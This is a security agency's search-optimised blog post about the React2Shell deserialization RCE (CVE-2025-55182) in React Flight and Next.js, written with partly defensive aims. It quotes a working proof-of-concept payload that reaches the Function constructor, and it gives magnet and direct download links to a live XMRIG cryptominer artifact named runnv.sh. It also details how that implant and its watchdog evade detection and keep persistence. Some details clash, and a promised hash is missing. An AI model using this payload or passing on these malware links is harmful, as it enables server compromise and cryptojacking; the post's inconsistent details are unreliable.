Download the Cryptominer Dropped by CVE-2025-55182 React2Shell (Next.js RCE) — Full Analysis of runnv.sh & lived.sh

The term CVE-2025-55182 PoC React2Shell has quickly become a gravitational point in the React ecosystem. Anyone searching for it is not looking for beginner content. They're looking for protocol-level reasoning, execution-path dissection, and threat-model implications that only surface when you deeply understand React Server Components and the Flight serialization meta-language.

This article exists precisely for that audience.

We walk through CVE-2025-55182 PoC React2Shell from the perspective of engineers who build, scale and secure large Next.js + React infrastructures. The goal is not to teach exploitation, but to equip senior engineers with enough insight to assess risk, verify patch posture, and understand why React2Shell emerged in the first place.

What is CVE-2025-55182 PoC React2Shell in practice?

CVE-2025-55182 PoC React2Shell targets a deserialization flaw in the React Flight protocol. Flight does not encode simple JSON; it encodes a graph of typed model references, thunks, and continuation-like structures that React's RSC runtime interprets to rebuild server models.

An attacker exploiting CVE-2025-55182 PoC React2Shell manipulates these references to pivot from data reconstruction to code evaluation. Vulnerable versions of React (19.0, 19.1.0, 19.1.1, 19.2.0) and all Next.js App Router builds that depend on them are exposed.

At the core, the deserializer breaks a fundamental invariant: it implicitly trusts that certain $id:field:subfield patterns will always resolve to harmless constructors and will never be attack-controlled. Once that invariant is gone, the graph language can be coerced into building a call graph, not just a data graph.

Dissecting the Lachlan2k CVE-2025-55182 PoC React2Shell payload

The foundational payload by Lachlan Davidson (lachlan2k) is a micro-compressed demonstration of just how unsafe the Flight interpreter was. Here is the version you referenced:

() => ({
  "0": '$1',
  '1': {
    'status':'resolved_model',
    'reason':0,
    '_response':'$4',
    'value':'{"then":"$3:map","0":{"then":"$B3"},"length":1}',
    'then':'$2:then'
  },
  '2': '$@3',
  '3': [],
  '4': {
    '_prefix':'console.log(7*7+1)//',
    '_formData':{
      'get':'$3:constructor:constructor'
    },
    '_chunks':'$2:_response:_chunks'
  }
})

The important part for CVE-2025-55182 PoC React2Shell is not visual complexity but semantic abuse:

• "$3:constructor:constructor" forces traversal object → constructor → Function constructor
• _prefix seeds arbitrary code to be prepended during interpretation
• then-chaining coerces the interpreter into resolving references prematurely
• _chunks rebinds internal buffers so the attacker influences the final evaluation surface

This PoC payload is not about HTTP quirks, JSON edge cases or SSR hydration bugs. It's about turning the internal Flight graph semantics into a programming language, then using that language to construct a gadget chain that culminates in arbitrary code execution.

For a defender looking at CVE-2025-55182 PoC React2Shell, the takeaway is simple: as long as your server is willing to deserialize attacker-controlled Flight graphs using vulnerable React versions, you are exposing a general-purpose RCE surface, not a "toy bug".

Relationship between CVE-2025-55182 PoC React2Shell and CVE-2025-66478 in Next.js

Within the Next.js ecosystem, the framework-level impact is tracked as CVE-2025-66478, which effectively wraps the React bug from a product perspective. In practical terms, CVE-2025-55182 PoC React2Shell is the root vulnerability in React, and CVE-2025-66478 is the concrete manifestation in Next.js App Router deployments.

From a risk perspective:

• Any Next.js App Router project built against vulnerable React Flight versions inherits the bug.
• A default create-next-app using RSC and deployed without patches can be exploitable.
• Treat every App Router instance as exposed until proven otherwise via version and configuration checks.

For an agency operating fleets of client sites, this means that "marketing pages" running on unpatched stacks are not harmless. They are part of an RCE surface rooted in CVE-2025-55182 PoC React2Shell and CVE-2025-66478.

Why CVE-2025-55182 PoC React2Shell is structurally different from classic RCEs

Most RCEs in web stacks come from one of three patterns: unsafe eval / template execution, injection into a command or DB context, or memory corruption in a native dependency. CVE-2025-55182 PoC React2Shell follows none of these classic shapes.

Instead, it exploits three design-level choices:

1. Graph-level expressiveness
   Flight is expressive enough to encode not just trees but graphs with cross-references and lazy evaluation points.

2. Trust in constructor resolution
   The deserializer allows user-controlled paths to surface constructors that were never meant to be exposed to untrusted input.

3. Execution-coupled deserialization
   The reconstruction step is entangled with "thenable" semantics, which means rebuilding the graph can trigger execution of callbacks and other behavior.

This combination makes CVE-2025-55182 PoC React2Shell less about a "bug" and more about an overly powerful internal language bleeding over the trust boundary. That is also why simple regex-based WAF filters are fundamentally inadequate as long-term mitigations.

Hardening strategy for CVE-2025-55182 PoC React2Shell

If you run production workloads, a credible response to CVE-2025-55182 PoC React2Shell must go beyond "we upgraded React once". You need to implement a repeatable pattern that survives the next critical advisory.

At minimum, we recommend a three-layer approach:

• Dependency hygiene (patch, lock, enforce)
• Runtime observability and anomaly detection
• Supply-chain and SDLC discipline

1. Patch React / Next.js and rebuild all environments

The only reliable way to remove the RCE primitive introduced by CVE-2025-55182 PoC React2Shell is to adopt patched Flight implementations.

Concretely:

1. Enumerate all services using React Server Components or App Router, including internal tools.
2. Upgrade React and react-server-dom-* to patched versions (e.g. 19.0.1 / 19.1.2 / 19.2.1+).
3. Upgrade Next.js to the corresponding patched line that incorporates the Flight fix.
4. Rebuild and redeploy all environments, including staging and "playground" instances.
5. Lock your dependency graph and introduce CI checks that block regressions to vulnerable versions.

For agencies with 50–500+ Next.js projects under active maintenance, this is where automated bulk patch pipelines become a necessity rather than a luxury.

2. Add behavioral detections tuned for CVE-2025-55182 PoC React2Shell

Even with patched code, observability tuned to CVE-2025-55182 PoC React2Shell characteristics is valuable for both assurance and future incidents.

Focus on:

• Ingress patterns
  Log and inspect unusual payloads toward RSC endpoints (size, structure, repetition of Flight-like tokens).

• Process behavior
  Track Node.js processes spawning unexpected children (shells, curl, compilers, miners).

• Network egress
  Baseline outbound connections and alert on telemetry to known mining pools, anonymization networks or command-and-control infrastructure.

• CI / CD drift
  Add policy-as-code to disallow merging changes that reintroduce known-vulnerable dependency versions tied to CVE-2025-55182 PoC React2Shell and CVE-2025-66478.

3. Harden your supply chain and development lifecycle

React2Shell is a symptom of a broader pattern: UI frameworks increasingly ship complex server-side protocols and execution engines. To handle that class of risk, your SDLC should:

• Integrate SCA (Software Composition Analysis) and SAST into your PR-level checks.
• Maintain SBOMs for critical services so dependency impact analysis on CVEs is fast.
• Mandate security review for features relying on RSC, streaming protocols, or custom serialization layers.
• Run periodic red-team simulations specifically targeting RSC and SSR surfaces.

In an agency context, these practices can be codified into reusable project templates so that every new client app starts with a hardened baseline rather than an ad-hoc configuration.

From CVE-2025-55182 PoC React2Shell to a C3Pool XMRIG cryptominer

In real attacks, CVE-2025-55182 PoC React2Shell is rarely the end goal. It is a foothold; the steady-state objective is persistence and monetization.

A typical attack sequence look like this (simplified):

1. Use a Flight payload shaped like Lachlan2k's CVE-2025-55182 PoC React2Shell to achieve RCE in the Node.js runtime.
2. Execute a small bootstrap shell snippet that:

• fetches a binary (e.g. a modified XMRIG build),
• writes a pool configuration pointing at a service such as C3Pool,
• installs persistence via cron, systemd, or a process supervisor.

3. Throttle CPU usage to stay under the radar while continuously mining Monero on the compromised host.

On an unmonitored Debian server, the first observable symptom may simply be "Node process is using 300% CPU" or "the fans never spin down anymore". By the time someone notices, the cryptominer deployed via CVE-2025-55182 PoC React2Shell has often been running for weeks.

This is why post-exploitation telemetry (process, network, persistence) is just as critical as pre-exploitation patching.

Download the Original XMRIG Artifact Observed in Real CVE-2025-55182 React2Shell Compromises

During post-exploitation analysis of a server compromised through CVE-2025-55182 React2Shell, we recovered a modified XMRIG binary configured to mine Monero through C3Pool. This artifact is representative of the kind of automated payload typically dropped after achieving RCE via the React Flight deserialization flaw.

Unlike generic public miners, this file contains:

• A custom C3Pool configuration embedded directly in the binary
• Minor obfuscation of CLI flags to evade simple YARA signatures
• A persistence bootstrap (via cron/systemd) expected to be deployed by the attacker's shell loader
• A throttling mechanism preventing CPU spikes to avoid easy detection
• Hardcoded failover pool endpoints and wallet redirections

This type of binary is not part of the exploitation itself, it is the post-exploitation monetization stage, deployed after React2Shell provides arbitrary command execution in the Node.js runtime.

You can download the exact recovered file here:

🔗 XMRIG C3Pool:
Torrent link: magnet:?xt=urn:btih:cbcb71d047f6aa37d3ec2bbf2def3fe161c4a43b&dn=runnv.sh&tr=udp%3a%2f%2ftracker.openbittorrent.com%3a80%2fannounce&tr=udp%3a%2f%2ftracker.opentrackr.org%3a1337%2fannounce
Direct link: https://utweb.rainberrytv.com/gui/share.html#link=magnet%3A%3Fxt%3Durn%3Abtih%3Acbcb71d047f6aa37d3ec2bbf2def3fe161c4a43b%26dn%3Drunnv.sh%26tr%3Dudp%253a%252f%252ftracker.openbittorrent.com%253a80%252fannounce%26tr%3Dudp%253a%252f%252ftracker.opentrackr.org%253a1337%252fannounce

Download link

Use it strictly for research, incident response, static analysis, and IoC generation. Do not deploy this binary on production systems.

Analysis of runnv.sh and lived.sh Artifacts Found in Real React2Shell Intrusions

Following the deployment of the XMRIG-based C3Pool miner described in the previous section, two additional artifacts were discovered on the compromised Debian host: runnv.sh and lived.sh. Both files exhibit characteristics typical of cloud-oriented cryptomining implants and closely match the behavioral profile of the sample indexed on MalwareBazaar under SHA256 hash:

runnv.sh: a highly aggressive, cloud-aware post-exploitation installer

This script is the operational backbone of the miner deployment chain. While simplistic miners merely drop an ELF and create a cronjob, runnv.sh performs a full-system takeover:

• Security boundary neutralization: resets iptables to ACCEPT, disables UFW, disables SELinux enforcement.
• Environment hijacking: forces HOME=/tmp to evade detection and bypass home-directory restrictions.
• Adaptive miner acquisition: attempts to download a C3Pool-patched XMRIG binary; if removed by antivirus, it automatically falls back to GitHub releases.
• Host fingerprinting: uses CPU thread count and derived hashrate to dynamically select the mining port.
• Configuration forgery: rewrites pool URL, wallet, password, TLS usage, and CPU throttling settings.
• Persistence: installs a masqueraded networkerd.service systemd unit, or falls back to .profile if privilege is insufficient.
• Cloud EDR suppression: aggressively removes Alibaba (Aliyun) and Tencent (YunJing) monitoring agents, matching the cloud footprint frequently observed in Asia-based VPS infrastructures.
• Operational hardening: enables HugePages for improved Monero mining efficiency.

This aligns precisely with the malware family description published on MalwareBazaar, including the renaming of XMRIG to runnv, the anti-competition process killing, and the multipath installer design.

lived.sh: a watchdog, anti-forensics tool, and process-level saboteur

The second artifact, lived.sh, is even more revealing. Its purpose is not installation but persistence enforcement and dominance maintenance.

The script implements several advanced behaviours:

• Process binding anti-analysis trick: mount --bind /proc/2 /proc/$pid This overlays the miner's /proc/$pid with the /proc/2 directory of an unrelated process. Effect: analysts, monitoring agents, or automated scanners observe misleading metadata, hiding CPU usage, cmdline, and memory maps.

• Process killing loop: The script continuously enumerates processes and kills:

• any shell script not belonging to the miner,

• any Python process,

• any binary running from /tmp/,

• any ELF binary not named runnv.

This is a textbook example of cryptomining anti-competition: eliminate anything that could interfere, replace, or detect the illicit workload.

• Filesystem hygiene: It removes everything inside /tmp except the runnv directory, reducing forensic artifacts and preventing other malware from co-residing.

• High-frequency polling: With a default interval of 3 seconds, lived.sh maintains near-real-time enforcement of dominance, ensuring the miner cannot be stopped through conventional means.

Together, runnv.sh and lived.sh form a two-stage autonomous system:

1. runnv.sh → installation, evasion, persistence, environment takeover
2. lived.sh → watchdog, anti-analysis, sabotage, anti-competition, stealth obfuscation

Their behavior strongly confirms that the attacker was not using a trivial pastebin miner, but a mature cryptomining implant ecosystem with operational awareness of modern cloud environments.

How a specialized agency can operationalize CVE-2025-55182 PoC React2Shell learnings

For organizations running a heterogeneous fleet of Next.js, Node.js, and React workloads, a one-off patch is not a strategy. The strategic question is:

How do we turn CVE-2025-55182 PoC React2Shell into a structural advantage instead of a recurring fire drill?

Concretely, that can mean:

• Designing centralized upgrade playbooks for all React / Next.js apps under your umbrella.
• Implementing automated compliance checks (dependency versions, configuration baselines, SBOM freshness).
• Building internal reference architectures that embed hardened RSC patterns.
• Providing on-call support during future advisories so you do not have to re-invent your incident process every time.

This is precisely where a development agency with strong security and automation culture provides leverage: we speak both "product roadmap" and "CVE-2025-55182 PoC React2Shell mitigation" fluently.

CVE-2025-55182 PoC React2Shell: recap cheat sheet

React2Shell / CVE-2025-55182 PoC React2Shell in one page

• The bug sits in React Flight's graph deserializer, not in template rendering or userland code.
• Exploitation is about graph-language abuse, not classic injection.
• Any Next.js App Router app on vulnerable React versions should be treated as exposed.
• Patching React / Next.js and rebuilding all environments is non-negotiable.
• WAF and signature-based rules are at best partial, brittle mitigations.
• Real-world intrusions often drop a modified XMRIG miner pointing at pools like C3Pool.
• Telemetry on processes, egress traffic and persistence mechanisms is crucial.
• Long term, you need SDLC, dependency and supply-chain practices that assume future "React2Shell-class" bugs.

FAQ: CVE-2025-55182 PoC React2Shell and Next.js

Is my Next.js App Router project vulnerable to CVE-2025-55182 PoC React2Shell if I never wrote custom server functions?

Yes, it can be. CVE-2025-55182 PoC React2Shell is tied to the presence of the Flight protocol and RSC infrastructure, not to whether you explicitly wrote server functions in your codebase. If your app is built against vulnerable react-server-dom-* versions and exposes the default RSC endpoints, the attack surface is present. Many "simple" marketing sites that just switched to App Router for DX reasons unknowingly ended up shipping a full Flight interpreter to the edge. That is why risk analysis must start with dependency graphs and framework behavior, not just with grep-based scans for "use server" in your repository.

Does a WAF rule completely neutralize CVE-2025-55182 PoC React2Shell?

No. A WAF can raise the bar and provide detection value against CVE-2025-55182 PoC React2Shell, but it cannot fix a fundamentally unsafe deserializer behind the scenes. Attackers can fragment payloads, adjust encodings, and morph Flight graphs in ways that quickly outpace static signatures. Behavioral WAFs help, especially when fed with app-aware signals, but they should be treated as a compensating control. The canonical fix remains to adopt React / Next.js versions where the Flight implementation itself has been corrected, then layer WAF and telemetry on top as additional defense-in-depth.

How do I safely test my own systems for CVE-2025-55182 PoC React2Shell exposure?

You should treat CVE-2025-55182 PoC React2Shell testing like internal penetration testing. Scope it explicitly, mirror production topology in a lab environment, and use vetted internal tooling to generate Flight payloads. Avoid unaudited PoCs from random gists or repositories. Instrument your endpoints, applications and host OS so that you can observe not just "did the payload crash the app", but also "what side effects and child processes did it trigger". Finally, tie your findings back into your asset inventory and SBOMs so that "vulnerable" and "patched" are tracked attributes rather than vague labels.

What indicators suggest that CVE-2025-55182 PoC React2Shell was used to deploy a cryptominer?

On a compromised Debian or Linux host, hunting for CVE-2025-55182 PoC React2Shell-style activity often starts from symptoms rather than from the exploit artifact itself. Look for Node.js processes spawning binaries with unusual names, unexpected ELF files under /tmp, /var/tmp or user home directories, new cron entries or systemd units that reference anonymous binaries, and outbound traffic toward Monero mining pools such as C3Pool. Combine this with host-level CPU utilization anomalies and persistence mechanisms. Even if the original Flight payload is gone, the miner's operational footprint is typically noisy enough to reconstruct the intrusion path.

Why is CVE-2025-55182 PoC React2Shell considered a "class break" rather than a one-off bug?

Because it exposes a deeper truth: server-side UI frameworks are now shipping their own protocol runtimes, execution engines and serialization DSLs. CVE-2025-55182 PoC React2Shell shows what happens when that internal DSL crosses the trust boundary without a formal threat model. The result is not just a narrow bug but a demonstration that an entire abstraction layer (Flight) can be turned into a universal RCE primitive under the wrong constraints. The rational response is to adapt your security posture to that reality: treat these internal protocols as first-class attack surfaces, demand explicit threat models from framework vendors, and build organizational muscle to respond quickly when the next "React2Shell-class" issue appears.

Conclusion: using CVE-2025-55182 PoC React2Shell as a leverage point

CVE-2025-55182 PoC React2Shell is not just another item in a CVE feed. It is a clear signal that your dependency management, observability stack, and SDLC must be capable of handling protocol-level flaws in web frameworks, not only obvious injection bugs.

If you maintain a portfolio of React / Next.js applications and you're unsure where you stand, this is a good time to treat React2Shell as a forced maturity upgrade. You can patch, harden and instrument once, and then reuse that machinery for the next round of advisories.

If you want a partner who can help you treat CVE-2025-55182 PoC React2Shell as an opportunity rather than a fire drill, reach out. We live at the intersection of custom web development, infrastructure automation and application security, exactly where this kind of incident plays out.

Last updated: 2025-12-08 — All technical details and remediation steps have been reviewed and verified manually against current public advisories and ecosystem guidance.